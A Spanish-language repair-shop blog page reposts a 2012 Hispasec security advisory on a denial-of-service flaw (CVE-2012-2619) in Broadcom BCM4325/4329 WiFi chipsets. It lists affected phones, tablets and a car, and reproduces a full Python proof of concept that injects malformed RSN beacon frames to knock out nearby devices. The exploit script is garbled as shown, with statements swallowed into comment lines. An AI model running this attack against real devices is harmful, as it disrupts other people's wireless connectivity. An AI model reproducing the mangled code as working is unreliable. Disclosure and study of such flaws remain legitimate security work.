BUSQUEDA EN GOOGLE

ABG COMPUTACION Y TECNOLOGIA

ABG COMPUTACION Y TECNOLOGIA
tecnicopcabg@gmail.com

NOTICIAS DE HOY DESDE SANTA FE y TWITER

------------------------------------------------------- TESTEA TU VELOCIDAD DE INTERNET ------------------------------------------------------- Test your Internet connection speed at Speedtest.net ------------------------------------------------------- ENTERATE DE TODO EN MI TWITTER HACE CLICK EN EL ENLACE SIGUIENTE -------------------------------------------------------

VIDEOS INFORMATICA

Loading...

CLASES Y REPARACION

clases y reparacion

clases y reparacion

Buscar este blog

TELEFONOS

TELEFONOS

ENSEÑANZA

ENSEÑANZA

NUEVOS TELEFONOS

4591009
4590083
155-779043




Mis paginas web con Información:
http://www.xigma74.com/

http://www.abgcomputacion.com/
----------------------------------------------------------------------Mail: tecnicopcabg@gmail.com




Nos dedicamos a:
servicio tecnico,computacion,servicio computacion,servicio computadoras,servicio tecnico computacion,computadoras,sola,computadora sola,servicio tecnico pc,servicio pc,reparaciones pc,informatica,mantenimiento redes,redes,instalacion redes,asistencia tecnica,asesoramiento,venta computadoras,pehuajo,sw computacion,sw,trenque lauquen,buenos aires,walter,dari,walter dari,redes inalambricas,Linux,servidores Linux,servidor Linux,sistemas administrativos,sistema administrativo,sistemas a medida,computadoras armadas,reparaciones computadoras,reparaciones,reparaciones computacion



Páginas vistas en total

lunes, 29 de octubre de 2012

RV: una-al-dia (27/10/2012) Denegación de servicio a multitud de Smartphones via WiFi

Denegación de servicio a multitud de Smartphones via WiFi
---------------------------------------------------------

Se ha publicado una vulnerabilidad presente en determinados Chipset de la
firma Broadcom, en especial los modelos BCM4325/29 integrados en multitud de
dispositivos inalámbricos como smartphones, tablets e incluso vehículos
(como el Ford Edge).

El fallo permitiría realizar una denegación de servicio al módulo
inalámbrico e incluso la revelación de información sensible según los
propios investigadores. El fallo podría reproducirse atacando directamente
al módulo WiFi independientemente del sistema operativo presente en el
dispositivo.

La vulnerabilidad (CVE-2012-2619) reportada por el laboratorio de CoreLabs
(Core Security Technologies) fue descubierta por el investigador argentino
Andrés Blanco, del que hizo pública demostración durante la pasada Ekoparty
en Buenos Aires, Argentina. Su compañero Matias Eissler desarrolló la prueba
de concepto totalmente funcional.

Mediante estudios de ingeniería inversa consiguieron comprender la
estructura del firmware de los dispositivos Broadcom, hallando la forma de
alterar el tráfico WiFi (normativa IEEE 802.11) de tal manera que afectara a
dichos dispositivos inalámbricos, a través del envío de tramas RSN (IEEE
802.11i, WPA/WPA2) especialmente manipuladas.

El protocolo RSN (Robust Security Network) interviene en la negociación y
establecimiento del tipo de autenticación y cifrado utilizado durante una
sesión WPA/WPA2.

En coordinación con los investigadores y el US-CERT, Broadcom facilitó a los
diferentes fabricantes (Apple, HTC, Motorola, Sony, Nokia,
Samsung...) un nuevo firmware que impide la vulnerabilidad para integrarlo
en sus dispositivos, por lo que se da como subsanada.

Los dispositivos afectados con el chipset BCM4325:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge

Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad

Y la prueba de concepto realizada por Matias Eissler:

- ------------------------- poc.py ------------------------- #!/usr/bin/env
python

import sys
import time
import struct
import PyLorcon2

def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096

# Frame Control
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon frame +=
'\x00' # Flags: 0 frame += '\x00\x00' # Duration: 0 frame +=
'\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff frame +=
'\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad frame +=
'\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad frame +=
struct.pack('H', sequence) # Fragment: 0 - Sequenence:
part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp frame += '\x64\x00' #
Beacon Interval: 0.102400 seconds frame += '\x11\x04' # Capability
Information: ESS, Privacy, Short Slot time # Information Elements # SSID:
buggy frame += '\x00\x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54 frame +=
'\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
# DS Parameter Set: 6
frame += '\x03\x01\x06'
# RSN IE
frame += '\x30' # ID: 48
frame += '\x14' # Size: 20
frame += '\x01\x00' # Version: 1
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP frame += '\x01\x00' #
Pairwise cipher suite count: 1 frame += '\x00\x0f\xac\x00' # Pairwise cipher
suite 1: TKIP frame += '\xff\xff' # Authentication suites count: 65535 frame
+= '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK frame +=
'\x00\x00'

sequence += 1
yield frame

if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "\t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)

iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()

generator = beaconFrameGenerator()

for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)

Opina sobre esta noticia:
http://unaaldia.hispasec.com/2012/10/denegacion-de-servicio-multitud-de.html
#comments

Más información:

VU#160027: Broadcom BCM4325 and BCM4329 wireless chipset denial-of-service
vulnerability
http://www.kb.cert.org/vuls/id/160027

Broadcom DoS on BCM4325 and BCM4329 devices
http://www.coresecurity.com/content/broadcom-input-validation-BCM4325-BCM432
9

One firmware to monitor 'em all
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publ
ication&name=One_firmware_to_monitor_em_all



José Mesa Orihuela
jmesa@hispasec.com


Tal día como hoy:
-----------------

27/10/2011: Cisco publica cinco boletines de seguridad
http://www.hispasec.com/unaaldia/4751

27/10/2010: 0-day en el navegador Mozilla Firefox explotado activamente
http://www.hispasec.com/unaaldia/4386

27/10/2009: Vulnerabilidad de Cross Site Scripting en IBM Lotus Connections
http://www.hispasec.com/unaaldia/4021

27/10/2008: Actualización del kernel para openSUSE 10.3
http://www.hispasec.com/unaaldia/3656

27/10/2007: Ejecución de código a través de IMAP en IBM Lotus Domino
http://www.hispasec.com/unaaldia/3290

27/10/2006: Alan Cox: "Se invierte mucho dinero en seguridad, pero también
en intentar romperla"
http://www.hispasec.com/unaaldia/2925

27/10/2005: Denegación de servicio en Apache 2.x
http://www.hispasec.com/unaaldia/2560

27/10/2004: Actualización para RealPlayer y RealOne Player
http://www.hispasec.com/unaaldia/2195

27/10/2003: Desbordamiento de búfer en línea de comandos de Oracle
http://www.hispasec.com/unaaldia/1828

27/10/2002: Nuevas versiones de Bugzilla
http://www.hispasec.com/unaaldia/1463

27/10/2001: Metodología para la programación segura
http://www.hispasec.com/unaaldia/1098

27/10/2000: Caso Microsoft: debilidades en el planteamiento
http://www.hispasec.com/unaaldia/733

27/10/1999: "Corner", nace el primer virus para MS Project
http://www.hispasec.com/unaaldia/365


-------------------------------------------------------------------
Claves PGP en http://www.hispasec.com/directorio/hispasec
-------------------------------------------------------------------
Bajas: mailto:unaaldia-request@hispasec.com?subject=unsubscribe
Altas: mailto:unaaldia-request@hispasec.com?subject=subscribe
-------------------------------------------------------------------
(c) 2012 Hispasec http://www.hispasec.com/copyright
-------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)

iQEcBAEBAgAGBQJQjnkOAAoJEI/UizGiFA4Ps2oH/047kol6UReqN82qN46+XRf2
oaA+nAqoL2MnXgX8i0SxOk2cAexkeolQNhcrcL1lk5C+MB4+Lha+jNEMig25wba+
A5mb9exvUFXr1YdF+ZgGXL5ZTkFkIrxfjhrswzhMSIy7l8hZRrtmAJWvBU0F0Iue
/pQz/FMfjSXfIFJCIzOnDCtpBu7CYQ5UwEPnVFAxyKuaLDebAuN9d7MGkGog+YLE
CEM15puTOhmQYyTuzKQK+drB43wNO2SH/UrmLqgOlKLFDM8gZbwxwgXc16vz57hv
mQMKKdNE3QkNq1KgyYWfOdxoEd7PrFEoucrlk3dRcdyJjv+FahXJmfisaMyEcZg=
=jlRv
-----END PGP SIGNATURE-----

No hay comentarios:

Publicar un comentario

muchas gracias por los comentarios